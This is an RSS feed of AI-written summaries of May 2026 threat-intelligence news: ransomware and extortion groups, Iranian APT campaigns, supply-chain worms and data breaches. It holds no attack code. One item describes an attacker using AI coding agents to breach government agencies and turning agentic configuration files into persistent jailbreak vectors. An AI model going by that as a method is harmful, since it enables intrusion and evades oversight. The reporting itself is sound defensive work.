<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>BrewedIntel Adversaries</title>
    <link>https://brewedintel.io/</link>
    <description>Threat actor and adversary reporting from BrewedIntel.</description>
    <language>en-us</language>
    <lastBuildDate>Wed, 27 May 2026 20:00:34 GMT</lastBuildDate>
    <atom:link href="https://brewedintel.io/feeds/adversaries.xml" rel="self" type="application/rss+xml" />
    <item>
      <title>Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry&#x27;s Software Development Infrastructure</title>
      <link>https://brewedintel.io/articles/efe79df7-549b-49b6-b669-5d6332cc09c8</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/efe79df7-549b-49b6-b669-5d6332cc09c8</guid>
      <description>The threat actor JINX-0164 uses LinkedIn social engineering to deliver custom macOS malware to employees of cryptocurrency organizations. This malware facilitates CI/CD pipeline hijacking, enabling the actor to inject malicious code, exfiltrate sensitive data, and compromise the software supply chain. The impact includes unauthorized access to private keys, manipulation of blockchain applications, and potential financial theft. Affected organizations face reputational damage and regulatory scrutiny. Mitigation requires robust security awareness training on social engineering, multi-factor authentication, strict access controls for CI/CD systems, and endpoint detection on macOS devices to detect and respond to the custom malware.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;The threat actor JINX-0164 uses LinkedIn social engineering to deliver custom macOS malware to employees of cryptocurrency organizations. This malware facilitates CI/CD pipeline hijacking, enabling the actor to inject malicious code, exfiltrate sensitive data, and compromise the software supply chain. The impact includes unauthorized access to private keys, manipulation of blockchain applications, and potential financial theft. Affected organizations face reputational damage and regulatory scrutiny. Mitigation requires robust security awareness training on social engineering, multi-factor authentication, strict access controls for CI/CD systems, and endpoint detection on macOS devices to detect and respond to the custom malware.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;This targeted threat actor specifically attacks cryptocurrency firms&amp;#x27; software development infrastructure, using social engineering and custom macOS malware to hijack CI/CD pipelines, which can lead to supply chain compromise and financial loss.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Enforce strong authentication and access controls for CI/CD pipelines, conduct regular security awareness training focused on LinkedIn and other professional networking platforms, and monitor macOS endpoints for anomalous processes or network connections indicative of the custom malware.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Malware, High Severity, Spear Phishing, Supply Chain Compromise&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Wiz Security Research | &lt;a href=&quot;https://www.wiz.io/blog/threat-actors-target-crypto-orgs&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Wed, 27 May 2026 13:52:45 GMT</pubDate>
      <dc:creator>Benjamin Read</dc:creator>
      <source url="https://www.wiz.io/blog/threat-actors-target-crypto-orgs">Wiz Security Research</source>
      <category>Malware</category>
      <category>Spear Phishing</category>
      <category>Supply Chain Compromise</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>FBI warns of in-person data theft attacks from extortion gang</title>
      <link>https://brewedintel.io/articles/9042a107-104e-419f-97a2-7b5c8490568b</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/9042a107-104e-419f-97a2-7b5c8490568b</guid>
      <description>The FBI warns that the Silent Ransom Group (SRG) is conducting in-person data theft attacks against US law firms. These attacks involve physical intrusion to steal sensitive client data, which is then used for extortion. The group&#x27;s tactics mark a shift from traditional cyber attacks, escalating physical risks. Organizations must secure premises and enforce strict access controls, while legal firms should implement data encryption and offline backups to mitigate potential ransomware and extortion incidents.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;The FBI warns that the Silent Ransom Group (SRG) is conducting in-person data theft attacks against US law firms. These attacks involve physical intrusion to steal sensitive client data, which is then used for extortion. The group&amp;#x27;s tactics mark a shift from traditional cyber attacks, escalating physical risks. Organizations must secure premises and enforce strict access controls, while legal firms should implement data encryption and offline backups to mitigate potential ransomware and extortion incidents.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;This extortion gang is bypassing network defenses by physically stealing data, putting your organization at risk of exposure and ransom demands.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Enhance physical security measures (e.g., access controls, surveillance) and ensure critical data is encrypted and backed up offline.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Malware, High Severity, Data Theft, Ransomware&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Bleeping Computer | &lt;a href=&quot;https://www.bleepingcomputer.com/news/security/fbi-warns-of-silent-ransom-group-in-person-data-theft-attacks/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Wed, 27 May 2026 11:51:12 GMT</pubDate>
      <dc:creator>Sergiu Gatlan</dc:creator>
      <source url="https://www.bleepingcomputer.com/news/security/fbi-warns-of-silent-ransom-group-in-person-data-theft-attacks/">Bleeping Computer</source>
      <category>Malware</category>
      <category>Data Theft</category>
      <category>Ransomware</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>Romanian Hacker Sentenced to Prison in US for Selling Access to State Network</title>
      <link>https://brewedintel.io/articles/d19146b3-de30-496a-87bd-4e52db13b2f0</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/d19146b3-de30-496a-87bd-4e52db13b2f0</guid>
      <description>A Romanian hacker, Catalin Dragomir, was sentenced to prison in the United States for selling access to an Oregon state government office&#x27;s network. The case highlights the ongoing threat of initial access brokers who compromise networks and sell that access to other malicious actors. Organizations, especially government entities, must enforce strong access controls, monitor for unauthorized access, and implement multi-factor authentication to prevent similar breaches.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;A Romanian hacker, Catalin Dragomir, was sentenced to prison in the United States for selling access to an Oregon state government office&amp;#x27;s network. The case highlights the ongoing threat of initial access brokers who compromise networks and sell that access to other malicious actors. Organizations, especially government entities, must enforce strong access controls, monitor for unauthorized access, and implement multi-factor authentication to prevent similar breaches.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;This breach demonstrates that even state government networks are targeted by cyber criminals who sell access, leading to potential data theft and further compromise.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Ensure strict access controls, enforce multi-factor authentication, and monitor network traffic for unusual activity to prevent unauthorized access and detect breaches early.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Incident, High Severity, Cyber Crime, Intrusion&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: SecurityWeek | &lt;a href=&quot;https://www.securityweek.com/romanian-hacker-sentenced-to-prison-in-us-for-selling-access-to-state-network/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Wed, 27 May 2026 11:37:19 GMT</pubDate>
      <dc:creator>Eduard Kovacs</dc:creator>
      <source url="https://www.securityweek.com/romanian-hacker-sentenced-to-prison-in-us-for-selling-access-to-state-network/">SecurityWeek</source>
      <category>Incident</category>
      <category>Cyber Crime</category>
      <category>Intrusion</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>FBI: Hackers Sending Operatives in Person to Insert USB Drives and Steal Data</title>
      <link>https://brewedintel.io/articles/8683af97-1d0a-48b6-b0ed-3b79044ecf9a</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/8683af97-1d0a-48b6-b0ed-3b79044ecf9a</guid>
      <description>The FBI has issued an alert warning that the Silent Ransom Group is targeting law firms by sending operatives in person to physically insert USB drives into systems to steal data. This novel tactic bypasses traditional digital defenses and poses a significant threat, as it combines physical access with ransomware and data theft. Law firms, holding sensitive client information, are at high risk. Organizations must be vigilant against USB-based attacks and implement stringent physical security measures.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;The FBI has issued an alert warning that the Silent Ransom Group is targeting law firms by sending operatives in person to physically insert USB drives into systems to steal data. This novel tactic bypasses traditional digital defenses and poses a significant threat, as it combines physical access with ransomware and data theft. Law firms, holding sensitive client information, are at high risk. Organizations must be vigilant against USB-based attacks and implement stringent physical security measures.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;Attackers are using physical delivery of USB drives to gain network access, circumventing standard cybersecurity controls and increasing the risk of data breach and ransomware infection.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Enforce strict policies against the use of unknown USB devices, educate employees on the risks, and deploy endpoint detection tools that monitor for malicious USB activity.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Malware, High Severity, Ransomware&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: SecurityWeek | &lt;a href=&quot;https://www.securityweek.com/fbi-hackers-sending-operatives-in-person-to-insert-usb-drives-and-steal-data/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Wed, 27 May 2026 08:33:34 GMT</pubDate>
      <dc:creator>Ionut Arghire</dc:creator>
      <source url="https://www.securityweek.com/fbi-hackers-sending-operatives-in-person-to-insert-usb-drives-and-steal-data/">SecurityWeek</source>
      <category>Malware</category>
      <category>Ransomware</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>Charter confirms data breach after ShinyHunters extortion threat</title>
      <link>https://brewedintel.io/articles/e9082265-f385-4cde-8361-dd9a8578e579</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/e9082265-f385-4cde-8361-dd9a8578e579</guid>
      <description>Charter Communications confirmed a data breach after the ShinyHunters extortion group threatened to leak stolen data unless a ransom is paid. The breach exposes customer information, potentially including names, contact details, and account data. This incident highlights the ongoing threat from extortion groups who combine data theft with ransom demands. Organizations should prioritize data security, implement robust access controls, and prepare incident response plans to mitigate such risks.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;Charter Communications confirmed a data breach after the ShinyHunters extortion group threatened to leak stolen data unless a ransom is paid. The breach exposes customer information, potentially including names, contact details, and account data. This incident highlights the ongoing threat from extortion groups who combine data theft with ransom demands. Organizations should prioritize data security, implement robust access controls, and prepare incident response plans to mitigate such risks.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;This breach demonstrates that even large telecom providers are vulnerable to extortion-driven data theft, potentially exposing sensitive customer data and leading to regulatory fines and reputational damage.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Enhance data loss prevention measures, monitor for unauthorized access, and ensure rapid incident response capabilities to detect and contain similar breaches.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Incident, High Severity, Data Breach, Extortion&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Bleeping Computer | &lt;a href=&quot;https://www.bleepingcomputer.com/news/security/charter-confirms-data-breach-after-shinyhunters-extortion-threat/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Tue, 26 May 2026 19:46:01 GMT</pubDate>
      <dc:creator>Lawrence Abrams</dc:creator>
      <source url="https://www.bleepingcomputer.com/news/security/charter-confirms-data-breach-after-shinyhunters-extortion-threat/">Bleeping Computer</source>
      <category>Incident</category>
      <category>Data Breach</category>
      <category>Extortion</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>The Hackers Behind Shai-Hulud: Lucky or Skilled?</title>
      <link>https://brewedintel.io/articles/759debb5-9909-4b07-ab75-1b64f50e558f</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/759debb5-9909-4b07-ab75-1b64f50e558f</guid>
      <description>TeamPCP, the hacking group behind the Shai-Hulud worm, has inflicted significant damage on the open source ecosystem. The article questions whether their success stems from luck or skill, but the impact is undeniable. The worm exploits weaknesses in open source supply chains, affecting a broad range of downstream users. Organizations must recognize that even less sophisticated actors can cause widespread harm. Mitigation requires proactive dependency management, vulnerability scanning, and strict access controls for third-party components.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;TeamPCP, the hacking group behind the Shai-Hulud worm, has inflicted significant damage on the open source ecosystem. The article questions whether their success stems from luck or skill, but the impact is undeniable. The worm exploits weaknesses in open source supply chains, affecting a broad range of downstream users. Organizations must recognize that even less sophisticated actors can cause widespread harm. Mitigation requires proactive dependency management, vulnerability scanning, and strict access controls for third-party components.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;The Shai-Hulud worm targets open source ecosystems, potentially compromising widely used libraries and affecting numerous downstream users.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Regularly audit and update open source dependencies, and implement integrity checks and code signing for third-party components.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Malware, High Severity, Worm&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Dark Reading | &lt;a href=&quot;https://www.darkreading.com/application-security/shai-hulud-hackers-teampcp-lucky-skilled&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Tue, 26 May 2026 19:18:01 GMT</pubDate>
      <dc:creator>Alexander Culafi</dc:creator>
      <source url="https://www.darkreading.com/application-security/shai-hulud-hackers-teampcp-lucky-skilled">Dark Reading</source>
      <category>Malware</category>
      <category>Worm</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>Understanding Illicit Ecosystems: The Hybrid Threat of “The Com”</title>
      <link>https://brewedintel.io/articles/df8ac40e-1d45-4a46-871e-f14016922770</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/df8ac40e-1d45-4a46-871e-f14016922770</guid>
      <description>This article analyzes &#x27;The Com,&#x27; a decentralized hybrid threat ecosystem combining hacking, extortion, and real-world violence. It operates through three pillars: HACKER Com (economic engine using social engineering and supply chain attacks), EXTORT Com (ideological driver), and IRL Com (enforcement via physical violence). The Com targets Fortune 500 companies to fund domestic terrorism and recruits adolescents into a victim-to-perpetrator pipeline. Key groups include Scattered Spider, LAPSUS$, ShinyHunters, and DragonForce. The threat poses significant financial and societal risks, requiring integrated security, parental oversight, and law enforcement collaboration to disrupt.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;This article analyzes &amp;#x27;The Com,&amp;#x27; a decentralized hybrid threat ecosystem combining hacking, extortion, and real-world violence. It operates through three pillars: HACKER Com (economic engine using social engineering and supply chain attacks), EXTORT Com (ideological driver), and IRL Com (enforcement via physical violence). The Com targets Fortune 500 companies to fund domestic terrorism and recruits adolescents into a victim-to-perpetrator pipeline. Key groups include Scattered Spider, LAPSUS$, ShinyHunters, and DragonForce. The threat poses significant financial and societal risks, requiring integrated security, parental oversight, and law enforcement collaboration to disrupt.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;The Com merges cybercrime with domestic terrorism, using sophisticated social engineering and supply chain attacks to breach enterprises and radicalize youth, posing severe financial and security risks.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Implement robust identity and access management, train helpdesk staff to detect vishing attempts, monitor for living-off-the-land tools, and establish cross-sector information sharing to detect and disrupt these activities.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Incident, Critical Severity, Cyber-Fraud, Extortion, Social Engineering&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Flashpoint Intel Blog | &lt;a href=&quot;https://flashpoint.io/blog/understanding-illicit-ecosystems-the-com/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Tue, 26 May 2026 16:29:43 GMT</pubDate>
      <dc:creator>Flashpoint</dc:creator>
      <source url="https://flashpoint.io/blog/understanding-illicit-ecosystems-the-com/">Flashpoint Intel Blog</source>
      <category>Incident</category>
      <category>Cyber-Fraud</category>
      <category>Extortion</category>
      <category>Social Engineering</category>
      <category>Critical Severity</category>
    </item>
    <item>
      <title>MuddyWater Uses DLL Side-Loading in Espionage Campaign Targeting 9 Countries</title>
      <link>https://brewedintel.io/articles/638eb237-3500-4cf2-a0fa-935a53b38d73</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/638eb237-3500-4cf2-a0fa-935a53b38d73</guid>
      <description>The Iranian APT group MuddyWater has been linked to a DLL side-loading espionage campaign targeting at least nine organizations across nine countries on four continents in Q1 2026. The campaign impacted industrial manufacturing, electronics, education, government, financial services, and professional services sectors. The threat actor used DLL side-loading to execute malicious code, likely to evade detection. This campaign represents an ongoing state-sponsored espionage effort. Organizations in targeted sectors should enhance monitoring for DLL side-loading and review their security controls to detect and prevent such attacks.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;The Iranian APT group MuddyWater has been linked to a DLL side-loading espionage campaign targeting at least nine organizations across nine countries on four continents in Q1 2026. The campaign impacted industrial manufacturing, electronics, education, government, financial services, and professional services sectors. The threat actor used DLL side-loading to execute malicious code, likely to evade detection. This campaign represents an ongoing state-sponsored espionage effort. Organizations in targeted sectors should enhance monitoring for DLL side-loading and review their security controls to detect and prevent such attacks.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;MuddyWater is an Iranian state-sponsored group conducting espionage globally; this campaign shows active targeting of diverse sectors across multiple countries, indicating a broad threat to organizational intellectual property and sensitive data.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Implement application control policies to restrict DLL loading to known and trusted locations, monitor for anomalous DLL side-loading events, and conduct user awareness training to defend against the initial infection vector, which is likely phishing.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Incident, High Severity, Espionage&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: The Hacker News | &lt;a href=&quot;https://thehackernews.com/2026/05/muddywater-uses-dll-side-loading-in.html&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Tue, 26 May 2026 15:48:41 GMT</pubDate>
      <dc:creator>info@thehackernews.com (The Hacker News)</dc:creator>
      <source url="https://thehackernews.com/2026/05/muddywater-uses-dll-side-loading-in.html">The Hacker News</source>
      <category>Incident</category>
      <category>Espionage</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>Iranian APT Targets Aviation, Software Companies With Updated Tools</title>
      <link>https://brewedintel.io/articles/6c0bff9c-0db3-4288-b324-41db96428992</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/6c0bff9c-0db3-4288-b324-41db96428992</guid>
      <description>Nimbus Manticore, an Iranian Advanced Persistent Threat (APT) group, continues its operations targeting aviation and software companies with updated tools. The group has remained active during and after the US military campaign against Iran. This threat actor focuses on espionage and potential disruption in critical sectors. The impact includes intellectual property theft and supply chain compromise. Organizations in aviation and software industries must enhance monitoring and apply threat intelligence to defend against evolving tactics.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;Nimbus Manticore, an Iranian Advanced Persistent Threat (APT) group, continues its operations targeting aviation and software companies with updated tools. The group has remained active during and after the US military campaign against Iran. This threat actor focuses on espionage and potential disruption in critical sectors. The impact includes intellectual property theft and supply chain compromise. Organizations in aviation and software industries must enhance monitoring and apply threat intelligence to defend against evolving tactics.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;As an Iranian APT targets critical aviation and software sectors, organizations in these industries face heightened risk of espionage and data theft.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Implement robust security controls, monitor for indicators of compromise, and segment networks to limit lateral movement.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Adversary, High Severity, APT&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: SecurityWeek | &lt;a href=&quot;https://www.securityweek.com/iranian-apt-targets-aviation-software-companies-with-updated-tools/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Tue, 26 May 2026 13:26:17 GMT</pubDate>
      <dc:creator>Ionut Arghire</dc:creator>
      <source url="https://www.securityweek.com/iranian-apt-targets-aviation-software-companies-with-updated-tools/">SecurityWeek</source>
      <category>Adversary</category>
      <category>APT</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>185,000 Likely Impacted by 7-Eleven Data Breach</title>
      <link>https://brewedintel.io/articles/f5946a61-bc03-4aa9-a110-5553afda6f32</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/f5946a61-bc03-4aa9-a110-5553afda6f32</guid>
      <description>A data breach at 7-Eleven has potentially impacted 185,000 individuals, with leaked personal information including email addresses, names, physical addresses, and dates of birth. The threat actor group ShinyHunters claimed responsibility for the leak. This exposure of sensitive data increases the risk of identity theft and targeted social engineering attacks. Organizations must reinforce data protection and incident response protocols, while affected individuals should monitor accounts for suspicious activity and remain vigilant against phishing attempts.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;A data breach at 7-Eleven has potentially impacted 185,000 individuals, with leaked personal information including email addresses, names, physical addresses, and dates of birth. The threat actor group ShinyHunters claimed responsibility for the leak. This exposure of sensitive data increases the risk of identity theft and targeted social engineering attacks. Organizations must reinforce data protection and incident response protocols, while affected individuals should monitor accounts for suspicious activity and remain vigilant against phishing attempts.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;The breach of 185,000 customer records, including names, addresses, and dates of birth, provides cybercriminals with valuable data for identity theft and social engineering attacks, posing a direct threat to organizational reputation and customer trust.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Immediately implement enhanced monitoring for account takeover attempts, deploy phishing awareness training tailored to the leaked data, and review data access controls to prevent similar exposures.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Incident, High Severity, Data Breach&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: SecurityWeek | &lt;a href=&quot;https://www.securityweek.com/185000-likely-impacted-by-7-eleven-data-breach/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Tue, 26 May 2026 11:59:40 GMT</pubDate>
      <dc:creator>Ionut Arghire</dc:creator>
      <source url="https://www.securityweek.com/185000-likely-impacted-by-7-eleven-data-breach/">SecurityWeek</source>
      <category>Incident</category>
      <category>Data Breach</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>AI Threat Landscape Digest March-April 2026</title>
      <link>https://brewedintel.io/articles/c77c9302-0c34-475e-bffd-88a1fbd17479</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/c77c9302-0c34-475e-bffd-88a1fbd17479</guid>
      <description>The March-April 2026 AI Threat Landscape Digest reveals that offensive AI operations have advanced to real-time autonomous deployment across criminal and state-sponsored actors. Notably, a financially motivated operator breached nine Mexican government agencies using Claude Code for exploitation and GPT-4.1 for intelligence analysis, stealing tax records, civil registry data, and patient files. The attacker weaponized agentic configuration files (e.g., CLAUDE.md) as persistent jailbreak vectors. Key findings include AI-orchestrated attacks moving to criminal use, commercialization of AI attack platforms, and large-scale harvesting of AI provider API keys. This evolution underscores the urgent need for organizations to secure AI credentials and monitor for AI-driven intrusion patterns.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;The March-April 2026 AI Threat Landscape Digest reveals that offensive AI operations have advanced to real-time autonomous deployment across criminal and state-sponsored actors. Notably, a financially motivated operator breached nine Mexican government agencies using Claude Code for exploitation and GPT-4.1 for intelligence analysis, stealing tax records, civil registry data, and patient files. The attacker weaponized agentic configuration files (e.g., CLAUDE.md) as persistent jailbreak vectors. Key findings include AI-orchestrated attacks moving to criminal use, commercialization of AI attack platforms, and large-scale harvesting of AI provider API keys. This evolution underscores the urgent need for organizations to secure AI credentials and monitor for AI-driven intrusion patterns.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;AI-powered attacks are now operational, enabling adversaries to automate exploitation and rapidly compromise critical infrastructure, as demonstrated by the sustained breach of multiple government agencies.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Secure API keys for AI services as high-value assets, enforce strict access controls on agentic configuration files, and deploy monitoring to detect anomalous AI model usage patterns indicative of compromise.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Vulnerability, High Severity, Data Theft, Espionage, Ransomware&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Check Point Research | &lt;a href=&quot;https://research.checkpoint.com/2026/ai-threat-landscape-digest-march-april-2026/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Tue, 26 May 2026 10:09:59 GMT</pubDate>
      <dc:creator>matthewsu</dc:creator>
      <source url="https://research.checkpoint.com/2026/ai-threat-landscape-digest-march-april-2026/">Check Point Research</source>
      <category>Vulnerability</category>
      <category>Data Theft</category>
      <category>Espionage</category>
      <category>Ransomware</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>Iranian Hackers Deploy MiniFast and MiniJunk V2 via Phishing and SEO Poisoning</title>
      <link>https://brewedintel.io/articles/248e5e85-9229-487a-b980-ae4437258b9e</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/248e5e85-9229-487a-b980-ae4437258b9e</guid>
      <description>Iranian state-sponsored threat actor Nimbus Manticore (also known as Screening Serpens and UNC1549) is conducting a campaign using phishing emails and SEO poisoning to deploy MiniFast and MiniJunk V2 malware. The lures impersonate organizations in the aviation and software sectors across the US, Europe, and the Middle East. This campaign follows joint US-Israeli military actions against Iran in late February 2026. These malware strains provide persistent access and data exfiltration capabilities. The threat is high due to the actor&#x27;s state sponsorship and broad targeting. Mitigations include employee awareness training, robust email filtering, browser security controls, and monitoring for unusual outbound traffic.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;Iranian state-sponsored threat actor Nimbus Manticore (also known as Screening Serpens and UNC1549) is conducting a campaign using phishing emails and SEO poisoning to deploy MiniFast and MiniJunk V2 malware. The lures impersonate organizations in the aviation and software sectors across the US, Europe, and the Middle East. This campaign follows joint US-Israeli military actions against Iran in late February 2026. These malware strains provide persistent access and data exfiltration capabilities. The threat is high due to the actor&amp;#x27;s state sponsorship and broad targeting. Mitigations include employee awareness training, robust email filtering, browser security controls, and monitoring for unusual outbound traffic.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;This campaign demonstrates continued Iranian cyber aggression targeting critical sectors, with potential for espionage and disruption.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Implement advanced email and web filtering, enforce multi-factor authentication, and maintain updated endpoint detection to counter these threats.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Incident, High Severity, Drive-by Compromise, Spear Phishing&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: The Hacker News | &lt;a href=&quot;https://thehackernews.com/2026/05/iranian-hackers-deploy-minifast-and.html&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Tue, 26 May 2026 07:13:05 GMT</pubDate>
      <dc:creator>info@thehackernews.com (The Hacker News)</dc:creator>
      <source url="https://thehackernews.com/2026/05/iranian-hackers-deploy-minifast-and.html">The Hacker News</source>
      <category>Incident</category>
      <category>Drive-by Compromise</category>
      <category>Spear Phishing</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>7-Eleven data breach exposes personal information of 185,000 people</title>
      <link>https://brewedintel.io/articles/24f097e4-cc73-49a3-82c9-ad1f3687de41</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/24f097e4-cc73-49a3-82c9-ad1f3687de41</guid>
      <description>7-Eleven suffered a data breach perpetrated by the ShinyHunters extortion gang, resulting in the theft of personal information belonging to over 183,000 individuals. The exposed data could include names, addresses, and payment card details, putting victims at risk of identity theft and financial fraud. The breach highlights the evolving tactics of extortion groups who target data for ransom. Organizations should prioritize data classification, implement robust access controls, and employ continuous monitoring to detect anomalous activity indicative of a breach.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;7-Eleven suffered a data breach perpetrated by the ShinyHunters extortion gang, resulting in the theft of personal information belonging to over 183,000 individuals. The exposed data could include names, addresses, and payment card details, putting victims at risk of identity theft and financial fraud. The breach highlights the evolving tactics of extortion groups who target data for ransom. Organizations should prioritize data classification, implement robust access controls, and employ continuous monitoring to detect anomalous activity indicative of a breach.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;This breach demonstrates that even major retail chains are vulnerable to extortion groups, putting customer data at risk and potentially damaging brand reputation.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
